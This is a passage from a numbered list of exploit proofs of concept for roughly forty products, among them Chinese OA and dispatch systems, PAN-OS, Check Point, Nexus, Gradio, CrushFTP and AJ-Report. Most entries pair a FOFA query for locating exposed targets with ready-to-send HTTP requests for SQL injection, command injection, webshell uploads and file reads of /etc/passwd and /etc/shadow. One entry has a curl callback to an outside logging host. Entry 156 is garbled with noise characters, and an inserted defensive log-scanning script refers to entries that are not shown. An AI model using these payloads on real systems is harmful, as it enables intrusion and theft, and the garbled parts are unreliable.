GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to execute
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path echoed in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 操作系统命令注入
4 U d$ H/ Y. Z/ ]# gCVE-2024-3721
( W8 u4 p( P9 ^7 E4 z0 MFOFA:"Location: /login.rsp"
- L, S6 r' M, [% a6 L# p5 R·TBK DVR-4104# W. p9 L% {6 K/ O. T, @
·TBK DVR-4216- a5 ^- D9 d) L2 q( R, S
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"( S: k: l9 O' {* J5 H2 |
% K. O, k7 P+ H+ ]3 |# Z" S1 k' ?3 g. p4 ~
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1" r1 g1 |# b0 D, X0 \ b% |
Host: x.x.x.x
] @& I g! o; D3 TUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% a6 p( @8 E) i7 S* b: f2 i5 uConnection: close) \- f: _2 s3 ~% @
Content-Length: 0
# q- K) L* f. M6 C: tCookie: uid=15 ]/ V% _, s3 T6 w
Accept-Encoding: gzip' r; c+ n) P- `* K* c; N- d" Y

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

The uploaded .asmx (its bufValue content is not reproduced on this page) is then reached at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name (the ../ prefix is honoured, which is what places the file under the web root) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file:
http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

solutionNo decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE, an error-based probe: SQL Server fails to convert the string "hello" to an integer and echoes it in the conversion error.

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
Time-based: a vulnerable host answers about 5 seconds later than normal.
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle GPS monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD licence-plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
Send the request line exactly as shown: most HTTP clients normalise the ../ segments away before sending (curl needs --path-as-is).
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

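Most of the request lines in this list are visible in an ordinary web-server access log, which is where a defender would look for attempts: the Nexus %2F..%2F traversal in 160, the /../ segments in 169, 170 and 178, the TBK ___S_O_S_T_R_E_A_MAX___ command in 156, the WAITFOR DELAY and SLEEP() probes in 169 and 171, and the INTO OUTFILE write in 185. The following Python is an added example written for this page; it is not code from the original article or from any listed vendor, and its log lines, addresses and timestamps are constructed. It percent-decodes each request target (twice, to catch double encoding) and matches a small signature set. Body-borne payloads such as the Check Point aCSHELL/../ POST body in 173 never reach an access log, which is why the /clients/MyCRL line below is not flagged; hunting for those needs request-body logging from a proxy or WAF.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/nginx combined-log form (hypothetical hosts and
# timestamps, not log data from the page). The request targets copy the shapes of
# the POCs in this list; the TBK "mdc" value is shortened to "id".
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jun/2024:10:00:01 +0800] "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1824
203.0.113.7 - - [01/Jun/2024:10:00:02 +0800] "POST /clients/MyCRL HTTP/1.1" 200 512
203.0.113.9 - - [01/Jun/2024:10:00:03 +0800] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=id HTTP/1.1" 200 77
203.0.113.9 - - [01/Jun/2024:10:00:04 +0800] "GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" 500 0
198.51.100.4 - - [01/Jun/2024:10:00:05 +0800] "GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%2741%27%29+into+outfile+%27x%27%23 HTTP/1.1" 200 10
198.51.100.4 - - [01/Jun/2024:10:00:06 +0800] "GET /static/app.css HTTP/1.1" 200 3001
198.51.100.5 - - [01/Jun/2024:10:00:07 +0800] "GET /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1" 200 3001
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures run against the decoded, lower-cased request target.
SIGNATURES = [
    ("path-traversal", re.compile(r"(?:^|/)\.\.(?:/|\\|$)")),
    ("time-based-sqli", re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(")),
    ("sql-file-write", re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("tbk-dvr-cmd-injection", re.compile(r"/device\.rsp\?.*___s_o_s_t_r_e_a_max___")),
]


def normalize(target: str) -> str:
    """Percent-decode twice (catches %252e-style double encoding), treat '+' as a
    space so 'WAITFOR+DELAY' reads as the SQL it is, and lower-case."""
    for _ in range(2):
        target = unquote_plus(target)
    return target.lower()


def scan_line(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalize(m.group("target"))
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "status": m.group("status"), "target": m.group("target"), "hits": hits}


def scan_log(text: str):
    """Scan every line of a log file's contents and return the findings in order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["method"], ",".join(finding["hits"]), finding["target"])
```

Run it as a script to print findings for the constructed sample, or call scan_log() on the contents of a real log. The signatures are deliberately narrow; extend SIGNATURES with the product-specific paths from this list (for example /device.rsp, /clients/MyCRL, /soap/AddUser) to turn it into an asset-specific sweep.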
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
